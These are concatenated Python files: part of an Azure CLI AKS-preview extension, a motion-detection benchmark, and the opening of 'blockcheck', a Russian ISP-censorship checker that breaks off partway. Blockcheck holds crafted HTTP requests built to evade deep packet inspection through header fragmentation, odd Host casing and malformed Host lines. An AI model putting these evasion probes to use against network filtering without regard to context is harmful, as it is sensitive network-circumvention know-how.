config_object.sysctls.net_ipv4_tcp_max_tw_buckets = sysctls.get(
"netIpv4TcpMaxTwBuckets", None)
config_object.sysctls.net_ipv4_tcp_fin_timeout = sysctls.get(
"netIpv4TcpFinTimeout", None)
config_object.sysctls.net_ipv4_tcp_keepalive_time = sysctls.get(
"netIpv4TcpKeepaliveTime", None)
config_object.sysctls.net_ipv4_tcp_keepalive_probes = sysctls.get(
"netIpv4TcpKeepaliveProbes", None)
config_object.sysctls.net_ipv4_tcpkeepalive_intvl = sysctls.get(
"netIpv4TcpkeepaliveIntvl", None)
config_object.sysctls.net_ipv4_tcp_rmem = sysctls.get(
"netIpv4TcpRmem", None)
config_object.sysctls.net_ipv4_tcp_wmem = sysctls.get(
"netIpv4TcpWmem", None)
config_object.sysctls.net_ipv4_tcp_tw_reuse = sysctls.get(
"netIpv4TcpTwReuse", None)
config_object.sysctls.net_ipv4_ip_local_port_range = sysctls.get(
"netIpv4IpLocalPortRange", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh1 = sysctls.get(
"netIpv4NeighDefaultGcThresh1", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh2 = sysctls.get(
"netIpv4NeighDefaultGcThresh2", None)
config_object.sysctls.net_ipv4_neigh_default_gc_thresh3 = sysctls.get(
"netIpv4NeighDefaultGcThresh3", None)
config_object.sysctls.net_netfilter_nf_conntrack_max = sysctls.get(
"netNetfilterNfConntrackMax", None)
config_object.sysctls.net_netfilter_nf_conntrack_buckets = sysctls.get(
"netNetfilterNfConntrackBuckets", None)
config_object.sysctls.fs_inotify_max_user_watches = sysctls.get(
"fsInotifyMaxUserWatches", None)
config_object.sysctls.fs_file_max = sysctls.get("fsFileMax", None)
config_object.sysctls.fs_aio_max_nr = sysctls.get("fsAioMaxNr", None)
config_object.sysctls.fs_nr_open = sysctls.get("fsNrOpen", None)
config_object.sysctls.kernel_threads_max = sysctls.get(
"kernelThreadsMax", None)
config_object.sysctls.vm_max_map_count = sysctls.get("vmMaxMapCount", None)
config_object.sysctls.vm_swappiness = sysctls.get("vmSwappiness", None)
config_object.sysctls.vm_vfs_cache_pressure = sysctls.get(
"vmVfsCachePressure", None)
return config_object
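# Illustrative only: a Linux OS configuration file in the shape read above.
# "sysctls" must be present (the parser raises CLIError otherwise); the keys
# mirror the .get() calls and the numbers are arbitrary examples.
_EXAMPLE_LINUX_OS_CONFIG = {
    "transparentHugePageEnabled": "madvise",
    "swapFileSizeMB": 1500,
    "sysctls": {
        "netCoreSomaxconn": 16384,
        "fsInotifyMaxUserWatches": 1048576,
        "vmMaxMapCount": 262144,
    },
}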
def _get_http_proxy_config(file_path):
if not os.path.isfile(file_path):
raise CLIError(
"{} is not valid file, or not accessable.".format(file_path))
hp_config = get_file_json(file_path)
if not isinstance(hp_config, dict):
raise CLIError(
"Error reading Http Proxy Config at {}. Please see https://aka.ms/HttpProxyConfig for correct format.".format(file_path))
config_object = ManagedClusterHTTPProxyConfig()
config_object.http_proxy = hp_config.get("httpProxy", None)
config_object.https_proxy = hp_config.get("httpsProxy", None)
config_object.no_proxy = hp_config.get("noProxy", None)
config_object.trusted_ca = hp_config.get("trustedCa", None)
return config_object
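# Illustrative only: an HTTP proxy configuration file in the shape read above.
# Keys mirror the .get() calls; the endpoints and CA value are placeholders.
_EXAMPLE_HTTP_PROXY_CONFIG = {
    "httpProxy": "http://proxy.example.com:3128",
    "httpsProxy": "https://proxy.example.com:3129",
    "noProxy": ["localhost", "127.0.0.1"],
    "trustedCa": "<base64-encoded CA certificate>",
}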
def aks_pod_identity_add(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace, identity_resource_id,
binding_selector=None,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
user_assigned_identity = _get_user_assigned_identity(
cmd.cli_ctx, identity_resource_id)
_ensure_managed_identity_operator_permission(
cmd.cli_ctx, instance, user_assigned_identity.id)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
pod_identities = instance.pod_identity_profile.user_assigned_identities
pod_identity = ManagedClusterPodIdentity(
name=identity_name,
namespace=identity_namespace,
identity=UserAssignedIdentity(
resource_id=user_assigned_identity.id,
client_id=user_assigned_identity.client_id,
object_id=user_assigned_identity.principal_id,
)
)
if binding_selector is not None:
pod_identity.binding_selector = binding_selector
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_delete(cmd, client, resource_group_name, cluster_name,
identity_name, identity_namespace,
no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identities = []
if instance.pod_identity_profile.user_assigned_identities:
for pod_identity in instance.pod_identity_profile.user_assigned_identities:
if pod_identity.name == identity_name and pod_identity.namespace == identity_namespace:
# to remove
continue
pod_identities.append(pod_identity)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=pod_identities,
pod_identity_exceptions=instance.pod_identity_profile.user_assigned_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_list(cmd, client, resource_group_name, cluster_name): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def aks_pod_identity_exception_add(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
pod_identity_exceptions = instance.pod_identity_profile.user_assigned_identity_exceptions
exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_delete(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
# to remove
continue
pod_identity_exceptions.append(exc)
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_update(cmd, client, resource_group_name, cluster_name,
exc_name, exc_namespace, pod_labels, no_wait=False): # pylint: disable=unused-argument
instance = client.get(resource_group_name, cluster_name)
_ensure_pod_identity_addon_is_enabled(instance)
found_target = False
updated_exc = ManagedClusterPodIdentityException(
name=exc_name, namespace=exc_namespace, pod_labels=pod_labels)
pod_identity_exceptions = []
if instance.pod_identity_profile.user_assigned_identity_exceptions:
for exc in instance.pod_identity_profile.user_assigned_identity_exceptions:
if exc.name == exc_name and exc.namespace == exc_namespace:
found_target = True
pod_identity_exceptions.append(updated_exc)
else:
pod_identity_exceptions.append(exc)
if not found_target:
raise CLIError(
'pod identity exception {}/{} not found'.format(exc_namespace, exc_name))
from azext_aks_preview.decorator import AKSPreviewModels
# store all the models used by pod identity
pod_identity_models = AKSPreviewModels(
cmd, CUSTOM_MGMT_AKS_PREVIEW).pod_identity_models
_update_addon_pod_identity(
instance, enable=True,
pod_identities=instance.pod_identity_profile.user_assigned_identities,
pod_identity_exceptions=pod_identity_exceptions,
models=pod_identity_models
)
    # send the managed cluster representation to update the pod identity addon
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, instance)
def aks_pod_identity_exception_list(cmd, client, resource_group_name, cluster_name):
instance = client.get(resource_group_name, cluster_name)
return _remove_nulls([instance])[0]
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
factory = get_auth_management_client(cli_ctx, scope)
assignments_client = factory.role_assignments
for i in assignments_client.list_for_scope(scope=scope, filter='atScope()'):
if i.scope.lower() != scope.lower():
continue
if not i.role_definition_id.lower().endswith(CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID):
continue
if i.principal_id.lower() != cluster_identity_object_id.lower():
continue
# already assigned
return
if not add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE, cluster_identity_object_id,
is_service_principal=False, scope=scope):
raise CLIError(
'Could not grant Managed Identity Operator permission to cluster identity at scope {}'.format(scope))
def aks_egress_endpoints_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
return client.list_outbound_network_dependencies_endpoints(resource_group_name, name)
def aks_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
cluster_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=cluster_id
)
snapshot = ManagedClusterSnapshot(
name=name,
tags=tags,
location=location,
creation_data=creationData,
snapshot_type="ManagedCluster",
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, name, snapshot, headers=headers)
def aks_snapshot_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, name)
return snapshot
def aks_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
    msg = 'This will delete the cluster snapshot "{}" in resource group "{}". Are you sure?'.format(
name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, name)
def aks_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
def aks_nodepool_snapshot_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
snapshot_name,
nodepool_id,
location=None,
tags=None,
aks_custom_headers=None,
no_wait=False):
rg_location = get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
creationData = CreationData(
source_resource_id=nodepool_id
)
snapshot = Snapshot(
name=snapshot_name,
tags=tags,
location=location,
creation_data=creationData
)
headers = get_aks_custom_headers(aks_custom_headers)
return client.create_or_update(resource_group_name, snapshot_name, snapshot, headers=headers)
def aks_nodepool_snapshot_show(cmd, client, resource_group_name, snapshot_name): # pylint: disable=unused-argument
snapshot = client.get(resource_group_name, snapshot_name)
return snapshot
def aks_nodepool_snapshot_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
snapshot_name,
no_wait=False,
yes=False):
from knack.prompting import prompt_y_n
    msg = 'This will delete the nodepool snapshot "{}" in resource group "{}". Are you sure?'.format(
snapshot_name, resource_group_name)
if not yes and not prompt_y_n(msg, default="n"):
return None
return client.delete(resource_group_name, snapshot_name)
def aks_nodepool_snapshot_list(cmd, client, resource_group_name=None): # pylint: disable=unused-argument
if resource_group_name is None or resource_group_name == '':
return client.list()
return client.list_by_resource_group(resource_group_name)
|
benchmark.py
|
from motion_marmot.utils.video_utils import extract_video
from motion_marmot.advanced_motion_filter import (
AdvancedMotionFilter,
MotionMaskMetadata,
)
from datetime import datetime
import typer
import time
import threading
import os
app = typer.Typer()
contour_count = 0
frame_count = 0
def motion_detection(amf: AdvancedMotionFilter, frame, meta, config):
mask = amf.mog2_mf.apply(frame.copy())
contours = amf.calculate_contours(mask)
is_variance_activated = config.get("variance")
is_large_bg_movement_activated = config.get("large_bg_movement")
is_dynamic_bbx_activated = config.get("dynamic_bbx")
variance = 0
frame_scene = 0
dynamic_bbx_thresh = 0
if (
is_variance_activated
or is_large_bg_movement_activated
or is_dynamic_bbx_activated
):
mask_area = MotionMaskMetadata(contours)
if is_variance_activated:
variance = amf.calculate_variance(mask_area.std)
if is_large_bg_movement_activated or is_dynamic_bbx_activated:
frame_scene = amf.ssc.predict(
mask_area.avg, mask_area.std, meta["width"], meta["height"]
)
if is_dynamic_bbx_activated:
dynamic_bbx_thresh = mask_area.avg + mask_area.std
for contour in contours:
global contour_count
contour_count += 1
if amf.mog2_is_detected(
contour=contour,
scene=frame_scene,
dynamic_bbx_thresh=dynamic_bbx_thresh,
variance=variance,
history_variance=is_variance_activated,
large_bg_movement=is_large_bg_movement_activated,
dynamic_bbx=is_dynamic_bbx_activated,
):
pass
def run_motion_filter(amf, video_frames: list, video_meta, config, flag):
for frame in video_frames:
global frame_count
frame_count += 1
motion_detection(amf=amf, frame=frame, meta=video_meta, config=config)
if not flag():
break
def recur_motion_filter(flag, video, config):
video_frames, video_meta = extract_video(video)
amf = AdvancedMotionFilter(
"model/scene_knn_model",
frame_width=video_meta["width"],
frame_height=video_meta["height"],
)
print(f"Start running at: {datetime.fromtimestamp(time.time())}")
while flag():
run_motion_filter(amf, video_frames, video_meta, config, flag)
global contour_count, frame_count
print(f"Processed Contours Number: {contour_count}")
print(f"Processed Frames Number: {frame_count}")
@app.command()
def evaluate_cpu(
video: str,
interval: int,
count: int,
variance: bool = typer.Option(False),
large_bg_movement: bool = typer.Option(False),
dynamic_bbx: bool = typer.Option(False),
):
pid = os.getpid()
thread_flag = True
config = {
"variance": variance,
"large_bg_movement": large_bg_movement,
"dynamic_bbx": dynamic_bbx,
}
def flag_trigger():
return thread_flag
amf_thread = threading.Thread(
target=recur_motion_filter, args=(flag_trigger, video, config)
)
amf_thread.start()
time.sleep(5)
    # run pidstat to sample the CPU usage of this process
pidstat_command = f"pidstat -u -p {pid} {interval} {count} | tail -n 1"
pidstat_process = os.popen(pidstat_command, "r")
print(pidstat_process.read())
pidstat_process.close()
    # signal the worker thread to stop
thread_flag = False
@app.command()
def motion_counts(
video: str,
bounding_box_threshold: int,
history_variance: bool,
variance_threshold: int,
variance_sample_amount: int,
large_bg_movement: bool,
dynamic_bbx: bool,
):
print("Extracting")
video_frames, video_meta = extract_video(video)
amf = AdvancedMotionFilter(
"model/scene_knn_model",
frame_width=video_meta["width"],
frame_height=video_meta["height"],
)
count = 0
print("Detecting")
total = len(video_frames)
i = 1
for frame in video_frames:
print(f"{int((i+1)/total*100)} %", end="\r")
mask = amf.mog2_mf.apply(frame.copy())
contours = amf.calculate_contours(mask)
mask_area = MotionMaskMetadata(contours)
frame_scene = amf.ssc.predict(
mask_area.avg, mask_area.std, video_meta["width"], video_meta["height"]
)
dynamic_bbx_thresh = mask_area.avg + mask_area.std
variance = amf.calculate_variance(mask_area.std)
for contour in contours:
if amf.mog2_is_detected(
contour=contour,
scene=frame_scene,
dynamic_bbx_thresh=dynamic_bbx_thresh,
variance=variance,
bounding_box_threshold=bounding_box_threshold,
history_variance=history_variance,
variance_threshold=variance_threshold,
variance_sample_amount=variance_sample_amount,
large_bg_movement=large_bg_movement,
dynamic_bbx=dynamic_bbx,
):
count += 1
break
i += 1
print("\n")
print(count)
@app.command()
def run():
print("dummy command")
def main():
"""Main program"""
app()
if __name__ == "__main__":
main()
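# Usage sketch (paths and numbers are illustrative, not documented defaults):
#   python benchmark.py evaluate-cpu path/to/video.mp4 5 3 --variance
# Typer exposes evaluate_cpu as the "evaluate-cpu" subcommand with the
# positional parameters in declaration order (video, interval, count) and the
# booleans as --variance / --large-bg-movement / --dynamic-bbx flags. The run
# also assumes pidstat is installed and that "model/scene_knn_model" exists
# relative to the working directory.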
|
blockcheck.py
|
#!/usr/bin/env python3
# coding: utf-8
import argparse
import json
import urllib.request
import urllib.parse
import urllib.error
import socket
import ssl
import sys
import os.path
import dns.resolver
import dns.exception
import ipaddress
import ipwhois
'''
=================================
IMPORTANT
Make sure to run this program with --no-report option
if you're editing it, debugging or testing something!
Thank you.
=================================
ВАЖНО
Запускайте программу с опцией --no-report, если
вы редактируете ее, отлаживаете или тестируете!
Спасибо.
=================================
'''
# Configuration
VERSION = "0.0.9.8"
SWHOMEPAGE = "https://github.com/ValdikSS/blockcheck"
SWUSERAGENT = "Blockcheck/" + VERSION + " " + SWHOMEPAGE
dns_records_list = (
# First server in this list should have both A and AAAA records
"rutracker.org", # Blocked by domain name.
"gelbooru.com", # Only several URLs are blocked, main page is not.
"e621.net", # Blocked by domain name. Website is HTTP only.
"danbooru.donmai.us", # Blocked by root URL.
"dailymotion.com", # Blocked by domain name.
"zello.com", # Blocked by domain name.
)
http_list = {
# Parameters:
# status: HTTP response code
# lookfor: Substring to search in HTTP reply body
# ip: IPv4 address. Used only if hostname can't be resolved using Google API.
# ipv6: IPv6 address
    # subdomain: set when the URL is a non-blacklisted subdomain of a blacklisted domain.
    # is_blacklisted: set to False if the website is not blacklisted and should be treated as such (defaults to True).
    'http://novostey.com':  # Not blacklisted; this page should open even when the ISP uses DPI.
{'status': 200, 'lookfor': 'novostey', 'ip': '172.64.80.1', 'ipv6': '2606:4700:130:436c:6f75:6466:6c61:7265'},
    'https://xn----stbgdeb4aai6g.xn--p1ai/':  # Blacklisted; this one should not open.
{'status': 200, 'lookfor': 'PoniBooru', 'ip': '37.1.203.158'},
'http://a.putinhuylo.com/':
{'status': 200, 'lookfor': 'Antizapret', 'ip': '195.123.209.38', 'subdomain': True,
'is_blacklisted': False},
}
https_list = {'https://rutracker.org/forum/index.php', 'https://lolibooru.moe/',
'https://e621.net/', 'https://www.dailymotion.com/'}
dpi_list = {
# These tests are currently performed only using IPv4. IPv6 field is not used.
'rutracker.org':
{'host': 'rutracker.org', 'urn': '/forum/index.php',
'lookfor': 'groupcp.php"', 'ip': '195.82.146.214', 'ipv6': '2a02:4680:22::214'},
'pbooru.com':
{'host': 'pbooru.com', 'urn': '/index.php?page=post&s=view&id=304688',
'lookfor': 'Related Posts', 'ip': '104.28.10.65', 'ipv6': '2400:cb00:2048:1::681c:a41'},
}
proxy_addr = '95.137.240.30:60030'
google_dns = '8.8.4.4'
google_dns_v6 = '2001:4860:4860::8844'
fake_dns = '3.3.3.3' # Fake server which should never reply
fake_dns_v6 = '2600::10:20'
google_dns_api = 'https://dns.google.com/resolve'
isup_server = 'isitdownrightnow.com'
isup_fmt = 'https://www.isitdownrightnow.com/check.php?domain={}'
disable_isup = False # If true, presume that all sites are available
disable_report = False
disable_ipv6 = False
force_ipv6 = False
force_dpi_check = False
# End configuration
ipv6_available = False
debug = False
web_interface = False
# Something really bad happened, which is most likely a bug: the system DNS
# resolver and Google DNS are unavailable while IPv6 generally works, and so on.
# The debug log is sent to the server if this variable is True.
really_bad_fuckup = False
printed_text = ''
printed_text_with_debug = ''
message_to_print = ''
try:
import tkinter as tk
import tkinter.scrolledtext as tkst
import threading
import queue
tkusable = True
if not (os.environ.get('DISPLAY') or os.environ.get('WAYLAND_DISPLAY')):
tkusable = False
class ThreadSafeConsole(tkst.ScrolledText):
def __init__(self, master, **options):
tkst.ScrolledText.__init__(self, master, **options)
self.queue = queue.Queue()
self.update_me()
def write(self, line):
self.queue.put(line)
def clear(self):
self.queue.put(None)
def update_me(self):
try:
while 1:
line = self.queue.get_nowait()
if line is None:
self.delete(1.0, tk.END)
else:
self.insert(tk.END, str(line))
self.see(tk.END)
self.update_idletasks()
except queue.Empty:
pass
self.after(100, self.update_me)
def tk_terminate():
root.destroy()
raise SystemExit
except ImportError:
tkusable = False
class ThreadSafeConsole():
pass
trans_table = str.maketrans("⚠✗✓«»", '!XV""')
def print_string(*args, **kwargs):
message = ''
newline = True
for arg in args:
message += str(arg) + " "
message = message.rstrip(" ")
for key, value in kwargs.items():
if key == 'end':
message += value
newline = False
if newline:
message += "\n"
return message
def print(*args, **kwargs):
global printed_text, printed_text_with_debug, message_to_print
if tkusable:
this_text = print_string(*args, **kwargs)
text.write(this_text)
printed_text += this_text
printed_text_with_debug += this_text
else:
if web_interface:
message_to_print += print_string(*args, **kwargs) + "<br>"
if args and sys.stdout.encoding != 'UTF-8':
args = [x.translate(trans_table).replace("[☠]", "[FAIL]").replace("[☺]", "[:)]"). \
encode(sys.stdout.encoding, 'replace').decode(sys.stdout.encoding) for x in args
]
if not web_interface:
__builtins__.print(*args, **kwargs)
this_text = print_string(*args, **kwargs)
printed_text += this_text
printed_text_with_debug += this_text
def print_debug(*args, **kwargs):
global printed_text_with_debug
this_text = print_string(*args, **kwargs)
printed_text_with_debug += this_text
if debug:
print(*args, **kwargs)
def really_bad_fuckup_happened():
global really_bad_fuckup
really_bad_fuckup = True
def _get_a_record(site, querytype='A', dnsserver=None):
resolver = dns.resolver.Resolver()
resolver.timeout = 5
resolver.lifetime = 5
if dnsserver:
resolver.nameservers = [dnsserver]
result = []
while len(resolver.nameservers):
try:
resolved = resolver.resolve(site, querytype)
print_debug(str(resolved.response))
for item in resolved.rrset.items:
result.append(item.to_text())
return result
except dns.exception.Timeout:
print_debug("DNS Timeout for", site, "using", resolver.nameservers[0])
resolver.nameservers.remove(resolver.nameservers[0])
# If all the requests failed
return ""
def _get_a_record_over_google_api(site, querytype='A'):
result = []
response = _get_url(google_dns_api + "?name={}&type={}".format(site, querytype))
print_debug("Google API: {}".format(response))
if (response[0] != 200):
        return []
response_js = json.loads(response[1])
try:
for dnsanswer in response_js['Answer']:
if dnsanswer['type'] in (1, 28):
result.append(dnsanswer['data'])
except KeyError:
pass
return result
def _get_a_records(sitelist, querytype='A', dnsserver=None, googleapi=False):
result = []
for site in sorted(sitelist):
try:
if googleapi:
responses = _get_a_record_over_google_api(site, querytype)
print_debug("Google API вернул {}".format(responses))
else:
responses = _get_a_record(site, querytype, dnsserver)
for item in responses:
result.append(item)
except dns.resolver.NXDOMAIN:
print(
"[!] Невозможно получить DNS-запись для домена {} (NXDOMAIN). Результаты могут быть неточными.".format(
site))
except dns.resolver.NoAnswer:
print_debug("DNS NoAnswer:", site)
except dns.exception.DNSException as e:
print_debug("DNSException:", str(e))
really_bad_fuckup_happened()
return sorted(result)
def _decode_bytes(input_bytes):
return input_bytes.decode(errors='replace')
def _get_url(url, proxy=None, ip=None, headers=False, follow_redirects=True):
class NoRedirectHandler(urllib.request.HTTPRedirectHandler):
def http_error_302(self, req, fp, code, msg, headers):
infourl = urllib.response.addinfourl(fp, headers, req.get_full_url())
infourl.status = code
infourl.code = code
return infourl
http_error_300 = http_error_302
http_error_301 = http_error_302
http_error_303 = http_error_302
http_error_307 = http_error_302
parsed_url = list(urllib.parse.urlsplit(url))
host = parsed_url[1]
if parsed_url[0].lower() == "https":
# Manually check certificate as we may need to connect by IP later
# and handling certificate check in urllib is painful and invasive
context_hostname_check = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
context_hostname_check.verify_mode = ssl.CERT_REQUIRED
conn = context_hostname_check.wrap_socket(socket.socket(socket.AF_INET6 if \
(':' in ip if ip else False) else socket.AF_INET),
server_hostname=host)
conn.settimeout(10)
print_debug("_get_url: connecting over " + ('IPv6' if \
(':' in ip if ip else False) else 'IPv4'))
try:
conn.connect((ip if ip else host, 443))
except (ssl.CertificateError) as e:
print_debug("_get_url: ssl.CertificateError", repr(e))
return (-1, '')
except (ssl.SSLError, socket.timeout, socket.error) as e:
print_debug("_get_url: socket exception", repr(e))
if 'CERTIFICATE_VERIFY_FAILED' in str(e):
return (-1, '')
return (0, '')
finally:
try:
conn.shutdown(socket.SHUT_RDWR)
except Exception:
pass
try:
conn.close()
except Exception:
pass
# SSL Context for urllib
context = ssl.create_default_context(ssl.Purpose.SERVER_AUTH)
# Disable SSL certificate check as we validated it earlier
# This is required to bypass SNI woes when we connect by IP
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
https_handler = urllib.request.HTTPSHandler(context=context)
if not follow_redirects:
# HACK: this works only for HTTP and conflicts with https_handler
opener = urllib.request.build_opener(NoRedirectHandler, https_handler)
else:
opener = urllib.request.build_opener(https_handler)
if ip:
parsed_url[1] = '[' + str(ip) + ']' if ':' in str(ip) else str(ip)
newurl = urllib.parse.urlunsplit(parsed_url)
req = urllib.request.Request(newurl)
req.add_header('Host', host)
else:
req = urllib.request.Request(url)
if proxy:
req.set_proxy(proxy, 'http')
req.add_header('User-Agent', SWUSERAGENT)
try:
opened = opener.open(req, timeout=15)
output = opened.read()
output = _decode_bytes(output)
if (headers):
output = str(opened.headers) + output
opened.close()
except (ssl.CertificateError) as e:
print_debug("_get_url: late ssl.CertificateError", repr(e))
return (-1, '')
except (urllib.error.URLError, ssl.SSLError, socket.error, socket.timeout) as e:
print_debug("_get_url: late socket exception", repr(e))
if 'CERTIFICATE_VERIFY_FAILED' in str(e):
return (-1, '')
if type(e) is urllib.error.HTTPError:
return (e.code, '')
return (0, '')
except (KeyboardInterrupt, SystemExit) as e:
# re-raise exception to send it to caller function
raise e
except Exception as e:
print("[☠] Неизвестная ошибка:", repr(e))
return (0, '')
return (opened.status, output)
def _cut_str(string, begin, end):
cut_begin = string.find(begin)
if cut_begin == -1:
return
cut_end = string[cut_begin:].find(end)
if cut_end == -1:
return
return string[cut_begin + len(begin):cut_begin + cut_end]
def get_ip_and_isp():
# Dirty and cheap
try:
request = urllib.request.Request("https://2ip.ru/",
headers={"User-Agent": SWUSERAGENT}
)
data = _decode_bytes(urllib.request.urlopen(request, timeout=10).read())
ip = _cut_str(data, '<big id="d_clip_button">', '</big>')
isp = ' '.join(_cut_str(data, '"/isp/', '</a>').replace('">', '').split())
if ip and isp:
isp = urllib.parse.unquote(isp).replace('+', ' ')
return (ip, isp)
except Exception:
return
def mask_ip(ipaddr):
ipaddr_s = ipaddress.ip_address(ipaddr)
if ipaddr_s.version == 4:
ipaddr_s = ipaddress.ip_interface(ipaddr + '/24')
return str(ipaddr_s.network).replace('0/24', 'xxx')
if ipaddr_s.version == 6:
ipaddr_s = ipaddress.ip_interface(ipaddr + '/64')
return str(ipaddr_s.network).replace(':/64', 'xxxx::')
return None
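# Usage sketch for mask_ip() above (documentation addresses only):
#   mask_ip('198.51.100.23') -> '198.51.100.xxx'
#   mask_ip('2001:db8::1')   -> '2001:db8:xxxx::'
# i.e. the host part is blanked before an address is printed or reported.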
def _dpi_send(host, port, data, fragment_size=0, fragment_count=0):
sock = socket.create_connection((host, port), 10)
if fragment_count:
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True)
try:
for fragment in range(fragment_count):
sock.sendall(data[:fragment_size].encode())
data = data[fragment_size:]
sock.sendall(data.encode())
recvdata = sock.recv(8192)
recv = recvdata
while recvdata:
recvdata = sock.recv(8192)
recv += recvdata
finally:
try:
sock.shutdown(socket.SHUT_RDWR)
except Exception:
pass
sock.close()
return _decode_bytes(recv)
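# Illustrative note on the sender above: with fragment_size=2 and
# fragment_count=6 it pushes the first 12 bytes of the request as six 2-byte
# sends (TCP_NODELAY keeps them from being coalesced locally) and then sends
# the rest in one piece; the "header fragmentation" entries built below rely
# on exactly this behaviour.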
def _dpi_build_tests(host, urn, ip, lookfor):
dpi_built_list = \
{'дополнительный пробел после GET':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'перенос строки перед GET':
{'data': "\r\nGET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'табуляция в конце домена':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}\t\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'фрагментирование заголовка':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 2, 'fragment_count': 6},
'точка в конце домена':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"Host: {}.\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'заголовок hoSt вместо Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"hoSt: {}\r\nConnection: close\r\n\r\n".format(host),
'lookfor': lookfor, 'ip': ip,
'fragment_size': 0, 'fragment_count': 0},
'заголовок hOSt вместо Host':
{'data': "GET {} HTTP/1.0\r\n".format(urn) + \
"hOSt: {}\r\nConnection: close\r\n\r\n".format(host),
